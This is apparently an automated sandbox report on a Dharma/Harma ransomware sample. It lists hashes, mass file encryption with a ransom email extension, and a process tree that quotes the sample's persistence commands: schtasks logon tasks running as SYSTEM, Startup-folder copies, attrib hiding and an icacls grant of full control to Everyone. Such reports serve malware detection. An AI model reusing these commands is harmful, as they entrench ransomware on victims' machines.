Analysis
-
max time kernel
151s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
22-12-2023 00:08
Static task
static1
Behavioral task
behavioral1
Sample
30e1234ef3e570667526fdb006832b12.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
30e1234ef3e570667526fdb006832b12.exe
Resource
win10v2004-20231215-en
General
-
Target
30e1234ef3e570667526fdb006832b12.exe
-
Size
913KB
-
MD5
30e1234ef3e570667526fdb006832b12
-
SHA1
01de8ba945945b58824f69553ac0f7b048645d45
-
SHA256
72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2
-
SHA512
00bd673f43cba1b16363433e672b30d22196fa0b67c024f970da15270323e545d15b3b990ed1dbbc3e7b9421c3f7840b10621c76203f89e0bcb1214e2a129e4e
-
SSDEEP
24576:Utp7PNBIIr2i1VzBPZYpoEjH2NzQufi9Re+SfM+:uPSiJP+BH2NQufire+SfM+
Malware Config
Signatures
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Renames multiple (4102) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe cmd.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
30e1234ef3e570667526fdb006832b12.exedescription ioc process File opened (read-only) \??\M: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\R: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\V: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\X: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\G: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\K: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\B: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\Q: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\Z: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\I: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\L: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\H: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\J: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\O: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\P: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\T: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\W: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\F: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\E: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\S: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\U: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\Y: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\N: 30e1234ef3e570667526fdb006832b12.exe File opened (read-only) \??\A: 30e1234ef3e570667526fdb006832b12.exe -
Drops file in Program Files directory 64 IoCs
Processes:
30e1234ef3e570667526fdb006832b12.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-core-kit.xml_hidden.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196110.WMF.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD08773_.WMF.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099193.GIF.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00200_.WMF.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00814_.WMF.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hebron.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FINCL_02.MID.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7MDT.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtobe.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Gibraltar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\DisableSkip.html.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Glace_Bay.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.access.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Mawson.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00117_.WMF.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00233_.WMF.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guam.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198372.WMF.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novosibirsk.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Athens.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-search.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Winnipeg.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lord_Howe.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Copenhagen.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuching.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107516.WMF.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife.id-79286055.[decryptioner@uncryptfile.com].HARMA 30e1234ef3e570667526fdb006832b12.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2796 schtasks.exe 2744 schtasks.exe 2968 schtasks.exe 2416 schtasks.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 2012 taskkill.exe 2648 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
30e1234ef3e570667526fdb006832b12.exepid process 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe 2228 30e1234ef3e570667526fdb006832b12.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
taskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2648 taskkill.exe Token: SeDebugPrivilege 2012 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
30e1234ef3e570667526fdb006832b12.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2228 wrote to memory of 2776 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2776 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2776 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2776 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2776 wrote to memory of 2416 2776 cmd.exe schtasks.exe PID 2776 wrote to memory of 2416 2776 cmd.exe schtasks.exe PID 2776 wrote to memory of 2416 2776 cmd.exe schtasks.exe PID 2776 wrote to memory of 2416 2776 cmd.exe schtasks.exe PID 2228 wrote to memory of 2280 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2280 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2280 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2280 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2328 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2328 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2328 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2328 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2740 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2740 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2740 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2740 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2740 wrote to memory of 2796 2740 cmd.exe schtasks.exe PID 2740 wrote to memory of 2796 2740 cmd.exe schtasks.exe PID 2740 wrote to memory of 2796 2740 cmd.exe schtasks.exe PID 2740 wrote to memory of 2796 2740 cmd.exe schtasks.exe PID 2228 wrote to memory of 2808 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2808 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2808 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2808 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2808 wrote to memory of 2816 2808 cmd.exe attrib.exe PID 2808 wrote to memory of 2816 2808 cmd.exe attrib.exe PID 2808 wrote to memory of 2816 2808 cmd.exe attrib.exe PID 2808 wrote to memory of 2816 2808 cmd.exe attrib.exe PID 2228 wrote to memory of 3016 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 3016 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 3016 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 3016 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 3016 wrote to memory of 2744 3016 cmd.exe schtasks.exe PID 3016 wrote to memory of 2744 3016 cmd.exe schtasks.exe PID 3016 wrote to memory of 2744 3016 cmd.exe schtasks.exe PID 3016 wrote to memory of 2744 3016 cmd.exe schtasks.exe PID 2228 wrote to memory of 2336 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2336 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2336 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2336 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2336 wrote to memory of 2968 2336 cmd.exe schtasks.exe PID 2336 wrote to memory of 2968 2336 cmd.exe schtasks.exe PID 2336 wrote to memory of 2968 2336 cmd.exe schtasks.exe PID 2336 wrote to memory of 2968 2336 cmd.exe schtasks.exe PID 2228 wrote to memory of 2632 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2632 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2632 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2632 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2632 wrote to memory of 2728 2632 cmd.exe attrib.exe PID 2632 wrote to memory of 2728 2632 cmd.exe attrib.exe PID 2632 wrote to memory of 2728 2632 cmd.exe attrib.exe PID 2632 wrote to memory of 2728 2632 cmd.exe attrib.exe PID 2228 wrote to memory of 2820 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2820 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2820 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2228 wrote to memory of 2820 2228 30e1234ef3e570667526fdb006832b12.exe cmd.exe PID 2820 wrote to memory of 2760 2820 cmd.exe attrib.exe PID 2820 wrote to memory of 2760 2820 cmd.exe attrib.exe PID 2820 wrote to memory of 2760 2820 cmd.exe attrib.exe PID 2820 wrote to memory of 2760 2820 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 2760 attrib.exe 2816 attrib.exe 2728 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe"C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"2⤵
- Drops startup file
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s harma.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s harma.exe3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s C:\ProgramData\harma.exe3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
-
